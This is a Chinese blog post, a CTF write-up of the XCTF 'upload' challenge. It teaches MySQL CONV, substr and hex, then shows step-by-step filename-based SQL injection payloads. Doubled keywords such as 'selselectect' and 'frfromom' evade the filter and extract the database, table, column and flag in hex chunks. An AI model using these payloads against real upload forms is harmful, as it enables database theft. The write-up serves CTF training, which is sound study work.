XCTF的upload

最新推荐文章于 2022-08-27 22:39:14 发布
最新推荐文章于 2022-08-27 22:39:14 发布
阅读量888 收藏
点赞数 5
分类专栏: 文件名注入 文件上传 sql双写注入 文章标签: xctf
原文链接:https://blog.csdn.net/weixin_42499640/article/details/96041817
版权

利用上传文件的文件名进行sql注入

这里先普及几个mysql函数的用法
	

		
		 1. CONV()
		 			简单的来说这个函数就是用来进行***进制的转换***的
		 			CONV(N,from_base,to_base)
					N是要转换的数据,from_base是原进制,to_base是目标进制。
					select conv(16,10,16);
					+—————-+
					| conv(16,10,16) |
					+—————-+
					| 10 |
					+—————-+
					1 row in set (0.04 sec)
					如果N是有符号数字,则to_base要以负数的形式提供,否则会将N当作无符号数
					
					
					mysql> select conv(-16,10,16);
					+——————+
					| conv(-16,10,16) |
					+——————+
					| FFFFFFFFFFFFFFF0 |
					+——————+
					1 row in set (0.00 sec)
					mysql> select conv(-16,10,-16);
					+——————+
					| conv(-16,10,-16) |
					+——————+
					| -10 |
					+——————+
					1 row in set (0.00 sec)
								 			
		2.substr()
					简单来说 这个函数是用来***搜索字符串***的
					substr(string string,num start,num length);

					string为字符串;
					
					start为起始位置;
					
					length为长度。
					
					mysql中的start是从1开始的,而hibernate中的start是从0开始的。	

		3.hex()
					这个就很好理解了,转为16进制嘛

 
 

 
 
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47

OK,接下来正式来看一下题
随便照一张图片,修改文件名为
‘+(selselectect CONV(substr(hex(database()),1,12),16,10))+’.jpg
这里使用复写绕过过滤
所以是 selselectect
查看数据库名

注意,这里substr取12位是因为一旦过长(超出12),就会用科学记数法显示

得到回显
在这里插入图片描述
将回显转为16进制,再转为字符串
在这里插入图片描述
在这里插入图片描述
然后修改一下substr的起始位置参数,看看后边还有没有
修改为:
‘+(selselectect CONV(substr(hex(database()),13,12),16,10))+’.jpg
上传

又得到一个回显
在这里插入图片描述
用相同的方法转为字符串
得到
在这里插入图片描述
拼起来就是web_upload

拿到库名

然后查表
‘+(seleselectct+CONV(substr(hex((selselectect TABLE_NAME frfromom information_schema.TABLES where TABLE_SCHEMA = ‘web_upload’ limit 1,1)),1,12),16,10))+’.jpg
得到回显
114784820031327
转16进制,转字符串
得到 hello_

继续往后查肯定还有
‘+(seleselectct+CONV(substr(hex((selselectect TABLE_NAME frfromom information_schema.TABLES where TABLE_SCHEMA = ‘web_upload’ limit 1,1)),13,12),16,10))+’.jpg
得到回显
112615676665705
转16进制转字符串
得到flag_i

查就完事儿了
‘+(seleselectct+CONV(substr(hex((selselectect TABLE_NAME frfromom information_schema.TABLES where TABLE_SCHEMA = ‘web_upload’ limit 1,1)),25,12),16,10))+’.jpg
得到回显
126853610566245
转16进制转字符串
得到s_here

查到这儿出来一具完整的句子
hello_flag_is_here
差不多就是它了

差这个表里有什么字段:
‘+(seleselectct+CONV(substr(hex((seleselectct COLUMN_NAME frfromom information_schema.COLUMNS where TABLE_NAME=‘hello_flag_i_here’ limit 0,1)),1,12),16,10))+’.jpg
得到回显
115858377367398
转转转
得到i_am_f

一看就没查完,接着查
‘+(seleselectct+CONV(substr(hex((seselectlect COLUMN_NAME frfromom information_schema.COLUMNS where TABLE_NAME = ‘hello_flag_is_here’ limit 0,1)),13,12),16,10))+’.jpg
得到回显
7102823

lag

拼起来:i_am_flag

最后一步了,查flag
‘+CONV(substr(hex((seleselectct i_am_flag frfromom hello_flag_is_here limit 0,1)),1,12),16,10)+’.jpg
得到回显
36427215695199

!!@m

接着查
‘+CONV(substr(hex((seleselectct i_am_flag frfromom hello_flag_is_here limit 0,1)),13,12),16,10)+’.jpg
得到回显
92806431727430

Th.e_F

继续
‘+CONV(substr(hex((seleselectct i_am_flag frfromom hello_flag_is_here limit 0,1)),25,12),16,10)+’.jpg
得到回显
560750951

!lag

拼起来:!!_@m_Th.e_F!lag

flag就出来了

小 白 渣
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web进阶—upload
weixin_42499640的博客
07-18 1458
这道题的大体思路是: 利用上传文件的文件名进行sql注入 这里先普及几个mysql函数的用法 1. CONV() 简单的来说这个函数就是用来进行***进制的转换***的 CONV(N,from_base,to_base) N是要转换的数据,from_base是原进制,to_base是目标进制。 select conv(16,10,16)...
文件上传注入——【XCTFupload writeup
Ve99tr’s Blog
10-04 1898
题目 题目名称为upload 进入页面,注册admin账号,登入admin账号,一切行如流水 来到了文件上传的页面 文件上传 尝试上传普通图片 ==>通过 这里通过测试发现,仅能上传后缀为jpg的文件,png等其他格式的图片文件均报错 尝试上传php一句话木马 ==>报错 尝试上传一句话图片马 ==>通过(但是并没有什么用,因为没有路径) 经过各种尝试,题目...
攻防世界XCTFupload
末初的CSDN博客
03-08 841
这里有个注册登入,迷惑行为,漏洞不在这里 这题比较意外,不是上传题是sql注入而且还是文件名的SQL注入, 因为回显的只是文件名,然后它存入数据库的也可能是文件名,既然连接了数据库就可能存在注入漏洞。然后就能想到可能是文件名sql注入。 任何与数据库发生连接交互的地方都可能存在SQL注入! 然后就开始构造文件名的payload,首先介绍几个函数。 conv(N,from_base,to_ba...
XCTF攻防世界题目upload(RCTF-2015)
daqiangdetianxia的博客
08-12 690
upload 信息搜集 dirsearch目录扫描,发现classes目录 然后进入classes目录,发现password.php user.php文件夹 中间件和服务器:Apache/2.4.7 (Ubuntu) 尝试 用sqlmap对登录和注册页面进行注入,发现不行。 注册后进行登录,发现有一个文件上传页面。可能是一个文件上传漏洞。 上传一句话木马,找不到上传后的文件夹,于是通过猜测上传文件夹名称,找不到,于是放弃文件上传漏洞。 文件上传后发现 ...
攻防世界ctf题目easyupload做题笔记。
qq_56426046的博客
08-27 4348
攻防世界ctf题目easyupload做题笔记。
xctf攻防世界 Web高手进阶区 upload1
l8947943的博客
08-03 9376
xctf攻防世界 Web高手进阶区 upload1
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)
Onlyone_1314的博客
11-23 4650
目录标题(1)把οnchange="check();去掉(2)禁用浏览器的JS脚本运行(3)Burp Suite抓包修改文件后缀名POST方法一句话木马GET方法一句话木马蚁剑连接 打开题目地址: 是一个文件上传的题目 选择一个一句话脚本上传: 前端存在JS代码校验文件类型,如果上传的文件后缀不是jpg和png,就会让上传按钮变得不使能: 要绕过前端的JS代码校验,常见的方法有: (1)把οnchange="check();去掉 可以直接把οnchange="check();去掉,这样提交文件的时候就
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
web 2.11 upload1.md
12-16
xctf
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
XCTF攻防世界web进阶练习_ 4_upload
silence1_的博客
05-01 2411
XCTF攻防世界web进阶练习—upload 题目 题目为updoad,是上传的意思,应该是文件上传相关题目 打开题目,不出意料,要求上传文件。 这里先试着随便上传一个php文件,试试水 弹出一个弹窗,提示要求上传一个图片 注意:这里是弹窗提示,所以考虑是js过滤。 所以传入一个内容为php,后缀为jpg文件上传,用burp抓包 将filename改为pino.php,内容为echo phpi...
XCTF-upload
aaeoj8957的博客
07-10 186
这道题的话,看了一下是RCTF-2015的原题。。。。可是这也太难了吧QAQ,文件名作为注入点可也是太秀了,害的我一直以为是文件上传QAQ,并且这道题的坑还不少,就是注入时的输出只能为10进制。。。。。这也就是说还需要你进行一下进制转换。。。 还有这里面将select和from过滤了一次。。。你还需要双写,,,哎。心累 一遍遍的fuzz的话,不知道要弄到什么时候。幸...
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
2018HitbCTF 萌新的upload题目writeup
publicStr的博客
04-14 1886
开始前的例行叨叨:被虐到怀疑人生,比赛群加了不少,题没做出来,签到倒是越来越专业了。记录下比赛后两小时才做出来的最简单web题upload。记录下尝试过的姿势。题目介绍:根目录下:/system/   403/admin/    403/upload/   403/upfile/     403还有某个需要寻找的目录文件:/index.html/flag.php/upload.php/pic.ph...
攻防世界XCTFupload1
末初的CSDN博客
03-08 742
前端验证,直接删除掉这段代码,或者浏览器关闭JS,然后上传webshell即可 啥函数都没有禁用,直接找flag cat了flag.php但是没有回显,可能是一个变量,查看一下源码 ...
xctf_web upload1
fly夏天的博客
09-30 1972
题目一打开就只有上传界面 习惯性的后台扫描一下没有可以页面,看来目标就在这个上传功能上面了。 尝试上传php文件,报错。 这里我尝试传了一个图片马,能成功上传但是菜刀无法执行。 f12检查源码,发现前端有一个js验证,有一个白名单过滤,只允许上传png或jpg文件。 这里我们可以直接前端删除这段js函数。 然后选择上传一个php文件,刷新即可成功上传。 网站直接给出了上传地址...
CTF入门指南2-相关靶场平台
syh_486_007的专栏
08-15 4698
相关靶场平台:1、IDF实验室:http://ctf.idf.cn/2、实验吧公司产品:http://www.shiyanbar.com/3、四叶草安全 这个公司做web比较强:http://www.seclover.com/4、XCTF_OJ练习平台   XCTF-OJ (X Capture The Flag Online Judge)是由XCTF组委会组织开发并面向XCTF联赛参赛者提供的网络
攻防世界writeup——Web(持续更新)
Lethe's Blog
08-12 8180
lottery(XCTF 4th-QCTF-2018) 打开题目先注册,然后发现flag可以购买。但得先去买彩票赢得足够的钱,七位数字的彩票,猜中的位数越多,赢得的钱越多,因此应该在买彩票这里出了一些漏洞。 1、首先访问目录robots.txt,存在.git泄露。 2、利用工具GitHack,得到网站源码: 3、进行代码审计,问题出现在api.php里的buy函数,这个函数就是用来判断是否猜...
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值